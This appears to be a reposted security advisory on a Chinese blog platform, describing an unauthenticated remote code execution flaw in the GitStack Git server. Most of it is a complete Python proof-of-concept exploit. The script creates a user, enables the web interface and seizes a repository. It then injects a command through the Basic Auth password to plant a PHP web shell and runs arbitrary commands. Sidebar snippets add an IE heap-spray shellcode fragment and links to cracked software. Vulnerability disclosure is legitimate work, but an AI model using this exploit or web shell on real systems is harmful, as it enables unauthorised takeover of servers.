Gitstack Remote code exec

最新推荐文章于 2021-06-16 17:03:46 发布
最新推荐文章于 2021-06-16 17:03:46 发布
阅读量401 收藏
点赞数
分类专栏: 漏洞列表

https://blogs.securiteam.com/index.php/archives/3557

Vendor response
We tried to contact GitStack since October 17 2017, repeated attempts to establish contact were answered, but no details have been provided on a solution or a workaround.

Vulnerability details
User controlled input is not sufficiently filtered, allowing an unauthenticated attacker can add a user to GitStack server by sending the following POST request:

Once the attacker has added a user to the server, he can enable the web repository feature.

Now the attacker can create a repository from remote and disable access to our new repository for anyone else.

In the repository the attacker is allowed to upload a backdoor and use it to execute code:

Proof of Concept

import requests
from requests.auth import HTTPBasicAuth
import os
import sys
 
ip = '192.168.15.102'
 
# What command you want to execute
command = "whoami"
 
repository = 'rce'
username = 'rce'
password = 'rce'
csrf_token = 'token'
 
user_list = []
 
print "[+] Get user list"
r = requests.get("http://{}/rest/user/".format(ip))
try:
user_list = r.json()
user_list.remove('everyone')
except:
pass
 
if len(user_list) > 0:
username = user_list[0]
print "[+] Found user {}".format(username)
else:
r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
print "[+] Create user"
if not "User created" in r.text and not "User already exist" in r.text:
  print "[-] Cannot create user"
  os._exit(0)
 
r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
print "[+] Web repository already enabled"
else:
print "[+] Enable web repository"
r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
print "r: %s" % r
if not "Web interface successfully enabled" in r.text:
  print "[-] Cannot enable web interface"
  os._exit(0)
 
print "[+] Get repositories list"
r = requests.get("http://{}/rest/repository/".format(ip))
repository_list = r.json()
 
if len(repository_list) > 0:
repository = repository_list[0]['name']
print "[+] Found repository {}".format(repository)
else:
print "[+] Create repository"
 
 
r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
print "[-] Cannot create repository"
os._exit(0)
 
print "[+] Add user to repository"
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
 
if not "added to" in r.text and not "has already" in r.text:
print "[-] Cannot add user to repository"
os._exit(0)
 
print "[+] Disable access for anyone"
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
 
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
print "[-] Cannot remove access for anyone"
os._exit(0)
 
print "[+] Create backdoor in PHP"
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST['a']); ?>" > c:GitStackgitphpexploit.php'))
print r.text.encode(sys.stdout.encoding, errors='replace')
 
print "[+] Execute command"
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : command})
print r.text.encode(sys.stdout.encoding, errors='replace')



PD_3569
关注
专栏目录
shellcodeexec, 在内存中,一系列操作码,要执行的脚本.zip
09-18
shellcodeexec, 在内存中,一系列操作码,要执行的脚本 背景在这里,大部分的shellcode启动程序包括了许多"安全"书籍的概念证明,详细介绍了如何在POSIX系统上分配内存页面,并在你的上进行复制,并。 这个工作正常。但是,它只限于 POSIX 。不必考虑 64位 架构和 Windows
GitStack 2.3.6 安装注册
09-29
GitStackCrack,GitStack 2.3.6 安装注册
MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 2
11-13 1001
var heapSprayToAddress = 0x05050505; var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
ExecCode:用于python代码快速执行的sublime插件
hjj66omg的博客
12-13 348
通过编写sublime插件实现python代码快速实现前言代码效果 前言 在写verilog代码的时候,碰上需要从0编号到100这种,会新建一个python代码,写个循环用sublime执行输出一下。但是有时候又觉得新建一个临时文件很烦,还要删掉。想起来python中还有exce()这个函数,通过编写一个插件,应该是可以直接执行代码片段的,无论这些代码是否保存在一个文件当中。 代码 插件代码: import os, sublime, sublime_plugin, re class ExecCodeC.
python 处理 HTTP Basic AUTH 以及json
一往如前的博客
10-29 4423
处理 HTTP Basic AUTH: import requests from requests.auth import AuthBase from requests.auth import HTTPBasicAuth a = HTTPBasicAuth('user', 'password') r = requests.get(url="http://xxx.xxx.xxx", auth=a...
gitstack2.3.6破解版
06-14
gitstack2.3.6、2.3.7破解版,有使用说明。你值得拥有哦!!
gitstack模板
10-31
GitStack是一款轻量级的Git服务器管理工具,它允许用户在本地或私有网络中轻松地搭建Git服务。本文将详细解析"gitstack模板"这一主题,并指导如何处理标题和描述中提到的问题。 首先,我们需要了解GitStack的基本...
GitStack_2.3.10最新破解方法
12-13
GitStack_2.3.10破解方法 1、安装GitStack 2、license.pyc复制替换到%GitStack安装目录%\python\Lib\site-packages\django\middleware\ 3、common.pyc和common.py复制替换到%GitStack安装目录%\app\gitstack\ 4、...
GitStack_2.3.11.rar
10-27
最新的gitstack,网络上找的,我是搬运工。windows下的版本控制工具。
基于GitStack搭建Git中心服务器
cleverbegin的专栏
03-14 3869
通过前一段时间对Git的学习,基本掌握了Git常用命令的使用方法,并进行了总结,有兴趣的可以看看Git常用命令的使用情景和Git学习笔记。 在Git常用命令的使用情景中提到过多人协作的项目往往是需要一个中心服务器来同步多人之间的工作成果,另外,最终的工作成果通常也是中心服务器上的代码为准(为了项目管理的需要),因此,备份时往往需要对中心服务器上的仓库进行刻盘。 中心服务器上创建的项目仓库一般为裸
Python——报错:ImportError: cannot import name requests
热门推荐
萌鼠喝酸奶的博客
11-16 1万+
这个是因为代码中import了requests第三方库,但却没有安装这个库。 把requests库安装即可,如何安装可以看这里:安装requests第三方库
python+requests——http basic auth认证
lvmengzou的专栏
06-16 3561
import requests from requests.auth import HTTPBasicAuth url = 'https://api.github.com/uesr' resp = requests.get(url,auth=HTTPBasicAuth('user','password')) #------------------------------------------------------------------------ import requests url =.
[Trouble Shooting] 解决requests模块使用过程中遇到 certificate verify failed 错误
FinixLei的专栏 (https://github.com/FinixLei)
04-17 5472
写了一个小程序,简单测试一个基于HTTPBasicAuthorization的REST API,解决其中遇到的证书错误问题
命令执行(Command Injection)与代码执行(Code execution)
qwzf
08-09 7246
前言 Web学习进行时,最近又学习了命令执行和代码执行漏洞。于是记录了学习过程。 命令执行与代码执行基础 简介 命令执行漏洞概念: 命令执行漏洞,就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 通俗的讲:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、s...
利用GitStack搭建Git服务器,以及Android Studio的如何配置Git,实现协同开发(windows系统下)。
weixin_40336827的博客
11-27 1601
以后肯定会经常写帖子祸害大家,工欲善其事必先利其器。所以先从工具安装以及配置开始吧。 首先大家要避免一个误区,GitStackGit是两码事,Gitstack搭建的是服务器,Git只是一个上传工具,工具是用来上传项目的,服务器是用来接收项目储存在服务器的。 本教程使用工具: GitStack_2.3.10  Git v2.19 Android studio3.0.1 目的: 利用Gi...
stays mad 反PCL宣传库。Anti PCL pro.zip
10-31
stays mad 反PCL宣传库。Anti PCL pro
伊犁师范大学在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
yolo算法-植物数据集-1417张图像带标签adamweeds.zip
最新发布
10-31
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别保存在两个文件夹中; yolo格式:<class> <x_center> <y_center> <width> <height>, 其中: <class> 是目标的类别索引(从0开始)。 <x_center> 和 <y_center> 是目标框中心点的x和y坐标,这些坐标是相对于图像宽度和高度的比例值,范围在0到1之间。 <width> 和 <height> 是目标框的宽度和高度,也是相对于图像宽度和高度的比例值
gitstack2.3.6
07-31
gitstack是一款可视化的Git服务器软件,版本号为2.3.6。它提供了一个图形化界面,使得Git版本控制系统更加易于使用和管理。GitStack允许用户创建自己的Git服务器,可以在本地或远程访问代码仓库。 首先,GitStack...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值